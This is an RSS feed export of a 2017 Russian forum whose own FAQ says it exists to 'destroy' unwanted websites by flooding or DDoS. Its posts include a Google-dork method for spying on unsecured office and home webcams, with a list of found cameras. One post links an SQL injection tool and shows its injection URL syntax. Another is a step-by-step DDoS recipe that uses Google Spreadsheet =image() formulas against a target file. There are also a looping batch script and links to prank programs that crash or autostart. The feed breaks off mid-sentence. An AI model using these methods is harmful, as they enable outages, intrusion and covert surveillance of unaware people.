<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://postoblog.mybb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>ПостоБлог</title>
		<link>http://postoblog.mybb.ru/</link>
		<description>ПостоБлог</description>
		<language>ru-ru</language>
		<lastBuildDate>Wed, 25 Oct 2017 17:48:41 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Креативы</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=267#p267</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://postoblog.mybb.ru/pages/edit&quot;&gt;Свобода!&lt;/a&gt; Поверь, ты можешь сделать с этой страницей всё что захочешь! просто нажимаешь на любой текст где угодно (например на логотипе), и пишешь!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Wed, 25 Oct 2017 17:48:41 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=267#p267</guid>
		</item>
		<item>
			<title>Бредятина</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=262#p262</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;- *Тук тук*&lt;br /&gt;- Кто там?&lt;br /&gt;&lt;span style=&quot;font-family: Comic Sans Ms&quot;&gt;- Комик Санс Мс :D&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Wed, 25 Oct 2017 15:20:00 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=262#p262</guid>
		</item>
		<item>
			<title>Тред для непроверенных</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=233#p233</link>
			<description>&lt;p&gt;Здесь можно общаться, готовить план атак на сайты, креативить, рейдить, фотошопить и монтировать видео.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 24 Oct 2017 18:08:28 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=233#p233</guid>
		</item>
		<item>
			<title>FAQ для только что пришедших</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=232#p232</link>
			<description>&lt;p&gt;В: В чём смысл данного форума?&lt;br /&gt;О: Мы общаемся, уничтожаем унылые проекты, делаем креативы, и многое другое.&lt;/p&gt;
						&lt;p&gt;В: Как мне научиться креативить? &lt;br /&gt;О: Посмотрите видеоурок по адоб фотошопу, скачайте данную программу, и пробуйте себя.&lt;/p&gt;
						&lt;p&gt;В: Что значит &amp;quot;Уничтожать уныние&amp;quot;? Типо уничтожать пессимистов что ли?&lt;br /&gt;О: Уничтожать уныние - Это уничтожать неугодные ресурсы путём флуда. Ну или DDoS&#039;a.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 24 Oct 2017 18:06:55 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=232#p232</guid>
		</item>
		<item>
			<title>Для тех, кто попал в неактив</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=231#p231</link>
			<description>&lt;p&gt;Если вы попали в неактив и вы не постили ничего уже 10 месяцев, то скорее всего ваш аккаунт будет удалён. Чтоб такого не произошло, надо говорить заранее.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 24 Oct 2017 18:00:54 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=231#p231</guid>
		</item>
		<item>
			<title>Перевод в проверенные</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=230#p230</link>
			<description>&lt;p&gt;1) Ваши контактные данные&lt;br /&gt;2) Город / область&lt;br /&gt;3) Почему ты хочешь стать проверенным?&lt;br /&gt;4) Ты кодер?&lt;br /&gt;5) Покажи свои навыки&lt;br /&gt;6) Расскажи о своей личной жизни&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 24 Oct 2017 17:56:04 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=230#p230</guid>
		</item>
		<item>
			<title>Склад картинок</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=227#p227</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://tlenta.ru/img/tlen/tlen336_wide.jpg&quot; alt=&quot;http://tlenta.ru/img/tlen/tlen336_wide.jpg&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 24 Oct 2017 15:12:01 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=227#p227</guid>
		</item>
		<item>
			<title>Склад гифок</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=219#p219</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://svalko.org/data/2017_09_07_14_1868_media_tumblr_com_b4d43523614fd8fd33cc753d62445c8b_tumblr_ovefkuo9Mr1tlb56zo1_400.gif&quot; alt=&quot;http://svalko.org/data/2017_09_07_14_1868_media_tumblr_com_b4d43523614fd8fd33cc753d62445c8b_tumblr_ovefkuo9Mr1tlb56zo1_400.gif&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 24 Oct 2017 12:57:33 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=219#p219</guid>
		</item>
		<item>
			<title>Чат</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=175#p175</link>
			<description>&lt;p&gt;&lt;a href=&quot;https://getmosh.io/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://getmosh.io/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 23 Oct 2017 14:39:15 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=175#p175</guid>
		</item>
		<item>
			<title>Цитат тред</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=153#p153</link>
			<description>&lt;p&gt;Получай всю пользу от интернета, с таким наслаждением, как будто бы своровал без палева 100 миллиардов рублей! Убивай в себе уныние! Уничтожай тех кто против тебя, уничтожай уныние в интернете.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Sun, 22 Oct 2017 13:06:10 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=153#p153</guid>
		</item>
		<item>
			<title>Тред о былом</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=150#p150</link>
			<description>&lt;p&gt;Что произошло с моими форумами? Во всём виноваты флудеры?&lt;/p&gt;
						&lt;p&gt;Пора восстанавливать наш форум. Набирать юзеров. И бороться за светлое будущее.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Sun, 22 Oct 2017 12:57:18 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=150#p150</guid>
		</item>
		<item>
			<title>Взлом вебкамер через Google</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=149#p149</link>
			<description>&lt;p&gt;Существует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности.&lt;br /&gt;Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность ивместо усиления системы безопасности служить ее разрушителем. Все дело втом, что зачастую они подключаются к корпоративной сети компаний по IP-протоколу и имеют прямой выход в Интернет. Функционал камеры позволяет просматривать изображение с нее при помощи обычного браузера, так как само устройство уже имеет встроенный веб-сервер. Это удобное изобретение, позволяющее экономить на экранах слежения, может привести к серьезным последствиям, если вовремя не подумать об ограничении такой «свободы слова».&lt;br /&gt;Консультант по вопросам информационной безопасности Роберт Шифрен (Robert Schifreen) создал сайт на котором подробно описал процесс поиска и подключения к открытым камерам слежения. Явление даже получило свое название в Интернете — Video Ham (в английском языке слово ham помимо «ветчины» имеет еще означает «радиолюбитель»).&lt;br /&gt;Перейдём к самой сути этой статьи. Как же поглядывать? Сама процедура поиска проста и доступна каждому любопытному пользователю:&lt;br /&gt;1. Открываем Google (или любой другой поисковик).&lt;br /&gt;2. Набираем в строке поиска CgiStart?page=Single (часть адреса мониторинга камер фирмы Panasonic) и клацаем Поиск.&lt;br /&gt;3. Ищем нужную нам ссылку (Обычно её заголовок &amp;quot;Network Camera&amp;quot;)&lt;br /&gt;4. Смотрим =). &lt;br /&gt;Вряд ли владельцы компаний мечтали о том, что за их сотрудниками будет «присматривать» какой нибудь Кулхацкер =)&lt;br /&gt;При всей серьезности проблемы, обеспечить безопасность крайне просто. Во-первых, нужно ограничить доступ к веб-камере корпоративной локальной сетью, исключив IP-адреса внешнего Интернета, во-вторых, необходимо установить пароль на просмотр изображений с камеры. При соблюдении этих несложных правил никакие скучающие пользователи не смогут нанести в ваш дом или офис нежданный визит, пусть даже и виртуальный. Так после нахождения таких уязвимостей к некоторым камерам всё-таки закрыли доступ, но всё равно их достаточно много.&lt;br /&gt;Вот некорый список камер который я накопал:&lt;br /&gt;Офисы: &lt;br /&gt;-link- &lt;br /&gt;-link- &lt;br /&gt;-link- &lt;br /&gt;-link-&lt;br /&gt;Природа: &lt;br /&gt;-link- &lt;br /&gt;-link- &lt;br /&gt;-link-&lt;br /&gt;Студия какая-то: &lt;br /&gt;-link-&lt;br /&gt;Автосервис: &lt;br /&gt;-link-&lt;br /&gt;Темно: &lt;br /&gt;-link-&lt;br /&gt;Компы, много: &lt;br /&gt;-link-&lt;br /&gt;Организация HomeEntertament&lt;br /&gt;-link-&lt;br /&gt;Че-то непонятное&lt;br /&gt;-link-&lt;br /&gt;какойта офис&lt;br /&gt;-link-&lt;br /&gt;Природа и горы&lt;br /&gt;-link-&lt;br /&gt;еще ссылка&lt;br /&gt;-link-&lt;br /&gt;Вроде б Клуб&lt;br /&gt;-link-&lt;br /&gt;ПРОЦЕСОРЫ ПРОЦЕСОРЫ И ЕЩЁ РАЗ ПРОЦЕСОРЫ&lt;br /&gt;-link-&lt;br /&gt;магазинчик&lt;br /&gt;-link-&lt;br /&gt;вроде домик чейта&lt;br /&gt;-link-&lt;br /&gt;Улица&lt;br /&gt;-link-&lt;br /&gt;CCTV Center&lt;br /&gt;-link-&lt;br /&gt;Немецкий провайдер чтоль&lt;br /&gt;-link-&lt;br /&gt;Прачечная&lt;br /&gt;-link-&lt;br /&gt;какаята контрольная комната&lt;br /&gt;-link-&lt;br /&gt;Домик&lt;br /&gt;-link-&lt;br /&gt;тот же домик толька с другой стороны&lt;br /&gt;-link-&lt;br /&gt;КТО НЕ ВИДЕЛ ОКЕАН ВАМ СУДА&lt;br /&gt;-link-&lt;br /&gt;темно но чтото там есть&lt;br /&gt;-link-&lt;br /&gt;офис&lt;br /&gt;-link-&lt;br /&gt;красява&lt;br /&gt;-link-&lt;br /&gt;Че-то японское&lt;br /&gt;-link-&lt;br /&gt;Тоже японцы&lt;br /&gt;-link-&lt;br /&gt;сад&lt;br /&gt;-link-&lt;br /&gt;домик&lt;br /&gt;-link-&lt;br /&gt;Админ-я Н.Новгорода&lt;br /&gt;-link-&lt;br /&gt;Некоторые камеры могут не работать в данное время. Попробуйте позже.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Sun, 22 Oct 2017 12:55:02 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=149#p149</guid>
		</item>
		<item>
			<title>Reverse IP Lookup</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=148#p148</link>
			<description>&lt;p&gt;Сервис для поиска доменов по IP адресу: &lt;a href=&quot;http://devel.wtf/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://devel.wtf/&lt;/a&gt;&lt;br /&gt;Работает довольно медленно, на определение 1 ибо уходит от 5 до 40 секунд.&lt;br /&gt;Если будут какие проблемы, или предложения, пишите в тему.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Sun, 22 Oct 2017 12:54:31 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=148#p148</guid>
		</item>
		<item>
			<title>Новая SQL Injection Tool 4</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=147#p147</link>
			<description>&lt;p&gt;SQL Injection Tool 4 beta.&lt;/p&gt;
						&lt;p&gt;Качаем, устанавливаем, отписываем.&lt;br /&gt;&lt;a href=&quot;http://dbattack.com/files/setup.sipt4.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://dbattack.com/files/setup.sipt4.rar&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Сразу скажу что появилось одно изменение, место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр getid, то в URL пишем&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://localhost/test.php?getid=1{SQLINJ}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;а если это текстовый параметр то URL будет такой&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://localhost/test.php?getid=1&#039;{SQLINJ}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
						&lt;p&gt;ну всё остальное похоже, сообственно кто захочет разберётся.&lt;br /&gt;на сайт не смотрите, пока только в стадии задумки :)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Sun, 22 Oct 2017 12:53:52 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=147#p147</guid>
		</item>
		<item>
			<title>Самый надоедливый вирус в блокноте</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=84#p84</link>
			<description>&lt;p&gt;Оригинал взят отсюда: &lt;a href=&quot;https://ru.wikihow.com/%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D1%82%D1%8C-%D0%B2%D0%B8%D1%80%D1%83%D1%81-%D1%88%D1%83%D1%82%D0%BA%D1%83-%D1%81-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C%D1%8E-%D0%91%D0%BB%D0%BE%D0%BA%D0%BD%D0%BE%D1%82%D0%B0&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://ru.wikihow.com/создать-вирус-шутку-с-помощью-Блокнота&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Всё что нужно, это вставить в блокнот данный код:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 9em&quot;&gt;&lt;pre&gt;@echo off
:a
start notepad
goto a&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
						&lt;p&gt;Перед тем как будете сохранять на своём рабочем столе, напишите в конце названия файла окончание &amp;quot;.bat&amp;quot;&lt;/p&gt;
						&lt;p&gt;Все, что он делает - открывает Блокнот бесконечное количество раз до тех пор, пока вы не закроете окно командной строки. Не запускайте ее на компьютере без присмотра - это может плохо закончиться.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://upload.wikimedia.org/wikipedia/ru/1/13/Windows_Notepad_Icon.png&quot; alt=&quot;https://upload.wikimedia.org/wikipedia/ru/1/13/Windows_Notepad_Icon.png&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Wed, 18 Oct 2017 17:19:11 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=84#p84</guid>
		</item>
		<item>
			<title>Программы шутки</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=78#p78</link>
			<description>&lt;p&gt;Руссификатор кнопок виндовса в новорусском стиле.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/bJUpl&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Прикольная программа пищит как телефон. Если вы запустили её на быстром компьютере из под Windows, то услышите лишь монотонное жужжание. Для выхода нажмите ESC.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/Y9O7r&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Резидентная программа для windows9x, которая время от времени изображает на экране чьи-то следы. Тоже была найдена с того диска, что и гирлянда.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/0UHb6&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Имитирует BSOD&lt;br /&gt;&lt;a href=&quot;http://qps.ru/mSKOU&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Звуковой файл с плеером, воспроизводящий фразу &amp;quot;Не трожь компьютер, болван!&amp;quot; :D&lt;br /&gt;&lt;a href=&quot;http://qps.ru/7kXtn&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Кирпичи. &amp;quot;Забросай&amp;quot; ими свой рабочий стол.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/zFlmO&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Вызвать появление &lt;em class=&quot;bbuline&quot;&gt;настоящего&lt;/em&gt; BSoD&lt;br /&gt;&lt;a href=&quot;http://qps.ru/2gPz5&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Кошка движется за курсором мыши, засыпает, если курсор останавливается, иногда потягивается во сне и мяукает.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/0kZ6N&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Старая добрая шутка с перезагрузкой.Программа показывает нам ,что компьютер взломан, ждёт три секунды, и в ребут&lt;br /&gt;&lt;a href=&quot;http://qps.ru/HGYpN&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;&amp;quot;Стреляем&amp;quot; по экрану рабочего стола.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/qTuwf&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Типа доктор веб.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/s20kR&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Антивирус для Windows 98,выпущенный компанией Durpersky Lab в 1999 году.Имеет только сканер для проверки файлов.Монитора нет.Отличается хорошим качеством проверок.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/lb76X&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Просто переворачивает экран на 180 градусов. Отключается по нажатию любой клавиши. Для Windows.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/Fe69U&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Домашний вирус. Шуточный вирус, умеющий даже лечить себя. Позволяет изучить принципы работы вирусов и антивирусов. Найден на диске с учебными программами. Имеет русский консольный интерфейс. Не распознаётся антивирусами. Не выполняет никаких деструктивных действий. Просто заражает файлы в текущем каталоге и показывает процесс. Просто запустите его с параметром /u и он вылечит все файлы. Полный список аргументов можете узнать командой &amp;quot;/?&amp;quot; Он довольно общирный можете что угодно заражать и лечить.Также можно извлечь тело вируса ключом /e.&lt;br /&gt;Вирус предназначен только для обучения.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/ABwaq&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Прикольная шутилка :)&lt;br /&gt;Добавляет себя в автозагрузку и выводит бесконечные диалоги.&lt;br /&gt;&lt;a href=&quot;http://qps.ru/eTQN7&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Интелектуальный Крякер Интернета.&lt;/p&gt;
						&lt;p&gt;Удачи в освоении просторов Интернета!&lt;br /&gt;&lt;a href=&quot;http://qps.ru/yqdwO&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Скачать&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Wed, 18 Oct 2017 16:00:46 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=78#p78</guid>
		</item>
		<item>
			<title>DDoS любого сайта с помощью Google Spreadsheet</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=57#p57</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://qps.ru/H5dFI&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Оригинал&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Google использует своего «паука» FeedFetcher для кэширования любого контента в Google Spreadsheet, вставленного через формулу &lt;strong&gt;=image(«link»)&lt;/strong&gt;.&lt;/p&gt;
						&lt;p&gt;Например, если в одну из клеток таблицы вставить формулу &lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;=image(&amp;quot;http://example.com/image.jpg&amp;quot;)&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;Google отправит паука FeedFetcher скачать эту картинку и закэшировать для дальнейшего отображения в таблице.&lt;/p&gt;
						&lt;p&gt;Однако если добавлять случайный параметр к URL картинки, FeedFetcher будет скачивать её каждый раз заново. Скажем, для примера, на сайте жертвы есть PDF-файл размером в 10 МБ. Вставка подобного списка в таблицу приведет к тому, что паук Google скачает один и тот же файл 1000 раз!&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;=image(&amp;quot;http://targetname/file.pdf?r=1&amp;quot;)&lt;br /&gt;=image(&amp;quot;http://targetname/file.pdf?r=2&amp;quot;)&lt;br /&gt;=image(&amp;quot;http://targetname/file.pdf?r=3&amp;quot;)&lt;br /&gt;=image(&amp;quot;http://targetname/file.pdf?r=4&amp;quot;)&lt;br /&gt;...&lt;br /&gt;=image(&amp;quot;http://targetname/file.pdf?r=1000&amp;quot;)&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;
						&lt;p&gt;Все это может привести к исчерпанию лимита трафика у некоторых владельцев сайтов. Кто угодно, используя лишь браузер с одной открытой вкладкой, может запустить массированную HTTP GET FLOOD-атаку на любой веб-сервер.&lt;/p&gt;
						&lt;p&gt;Атакующему даже необязательно иметь быстрый канал. Поскольку в формуле используется ссылка на PDF-файл (т.е. не на картинку, которую можно было бы отобразить в таблице), в ответ от сервера Google атакующий получает только &lt;strong&gt;N/A&lt;/strong&gt;.&amp;#160; Это позволяет довольно просто многократно усилить атаку &lt;span style=&quot;font-style: italic&quot;&gt; [Аналог DNS и NTP Amplification – прим. переводчика]&lt;/span&gt; что представляет серьезную угрозу.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://habrastorage.org/getpro/habr/post_images/76c/b20/e4c/76cb20e4c5e9ed886c03762ae3c2411e.png&quot; alt=&quot;https://habrastorage.org/getpro/habr/post_images/76c/b20/e4c/76cb20e4c5e9ed886c03762ae3c2411e.png&quot; /&gt;&lt;br /&gt;С использованием одного ноутбука с несколькими открытыми вкладками, просто копируя-вставляя списки ссылок на файлы по 10 МБ, паук Google может скачивать этот файл со скоростью более 700 Мбит/c. В моем случае, это продолжалось в течение 30-45 минут, до тех пор, пока я не вырубил сервер. Если я все правильно подсчитал, за 45 минут ушло примерно 240GB трафика.&lt;/p&gt;
						&lt;p&gt;Я удивился, когда увидел объем исходящего трафика. Еще немного, и я думаю, исходящий трафик достиг бы 1 Гбит/с, а входящий 50-100 Мбит/с. Я могу только представить, что произойдет, если несколько атакующих будут использовать этот метод. Паук Google использует не один IP-адрес, и хотя User-Agent всегда один и тот же, редактировать конфиг веб-сервера может быть слишком поздно, если атака застанет жертву врасплох. Благодаря простоте использования, атака легко может продолжаться часами.&lt;/p&gt;
						&lt;p&gt;Когда обнаружился этот баг, я стал гуглить инциденты с его использованием, и нашел два:&lt;br /&gt;• Статья, &lt;a href=&quot;http://qps.ru/mdhM6&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;где блогер описывает,&lt;/a&gt; как случайно атаковал сам себя и получил огромный счет за трафик. [ &lt;a href=&quot;http://qps.ru/96OBi&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Перевод на хабре&lt;/a&gt; – прим. переводчика].&lt;br /&gt;• &lt;a href=&quot;http://qps.ru/pImCz&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Другая статья&lt;/a&gt; описывает похожую атаку с помощью Google Spreadsheet, но сначала, автор предлагает спарсить ссылки на все файлы сайта и запустить атаку по этому списку с использованием нескольких аккаунтов.&lt;/p&gt;
						&lt;p&gt;Я нахожу несколько странным, что никто не догадался попробовать добавить к запросу случайный параметр. Даже если на сайте всего один файл, добавление случайного параметра позволяет сделать тысячи запросов к этому сайту. На самом деле, это немного пугает. Простая вставка нескольких ссылок в открытую вкладку браузера не должна приводить к такому.&lt;/p&gt;
						&lt;p&gt;Вчера я отправил описание этого бага в Google и получил ответ, что это не уязвимость, и не проходит по программе Bug Bounty. Возможно, они заранее знали о нём, и действительно не считают это багом?&lt;/p&gt;
						&lt;p&gt;Тем не менее, я надеюсь, они пофиксят эту проблему. Просто немного раздражает, что любой может заставить паука Google доставить столько проблем. Простой фикс заключается в том, чтобы скачивать файлы пропуская дополнительные параметры в URL [На мой взгляд, это очень плохой фикс. Возможно, стоит ограничить пропускную способность или лимитировать количество запросов и трафик в единицу времени и при этом не скачивать файлы больше определенного размера – прим. переводчика].&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Tue, 17 Oct 2017 13:28:15 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=57#p57</guid>
		</item>
		<item>
			<title>Понятие &quot;Троллинг&quot;</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=44#p44</link>
			<description>&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;Тро&amp;#769;ллинг (от англ. trolling — блеснение, ловля рыбы на блесну) — написание в Интернете (на форумах, в группах новостей Usenet, в вики-проектах, ЖЖ и др.) провокационных сообщений с целью вызвать флейм, конфликты между участниками, пустой трёп, оскорбления и т. п. Занимающийся троллингом называется троллем, что совпадает с названием мифологического существа.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;Тролль-однодневка&lt;br /&gt;Сообщения тролля-однодневки носят явно провокационный характер и способны вызывать агрессивные ответы.&lt;br /&gt;Тролль-провокатор&lt;br /&gt;Офтопик: сообщения, которые являются несоответствующими направленности форума.&lt;br /&gt;Раздувание страницы: размещение изображений большого размера с целью сделать предыдущие сообщения трудночитаемыми.&lt;br /&gt;Медиа-атака: раздражающие слух звуковые файлы, шокирующие изображения в сообщении или ссылки на ресурсы с подобным содержанием. Зачастую ссылки замаскированы.&lt;br /&gt;Подстрекание, включая комментарии с расистским содержанием.&lt;br /&gt;Самоуверенные утверждения: выражение собственного мнения как общепринятого факта без аргументации или анализа, разжигание «религиозных войн» (holy war) (linux rulez — windows suxx, intel suxx — amd rules, rap rulezz — black-metal suxx и т. д.).&lt;br /&gt;Спойлер: преднамеренная публикация развязки свежего и популярного на данный момент кинофильма или романа.&lt;br /&gt;Возобновление или перефразирование очень спорной прошлой темы, особенно в небольших сообществах.&lt;br /&gt;Преднамеренное и повторное неправильное написание ников (имён, псевдонимов) других пользователей с целью оскорбить их или вызвать у них раздражение.&lt;br /&gt;Тролль-эгоцентрик&lt;br /&gt;Этот тип стремится получить как можно больше ответов на свои сообщения и завоевать чрезмерное внимание в коллективе.&lt;br /&gt;Рекламирование другого форума, особенно конкурирующего или недолюбливаемого.&lt;br /&gt;Явная ложь в самоидентификации: «У меня, как у настоящего самурая, проблемы с фильмом „Семь самураев“».&lt;br /&gt;Сообщения, содержащие очевидный 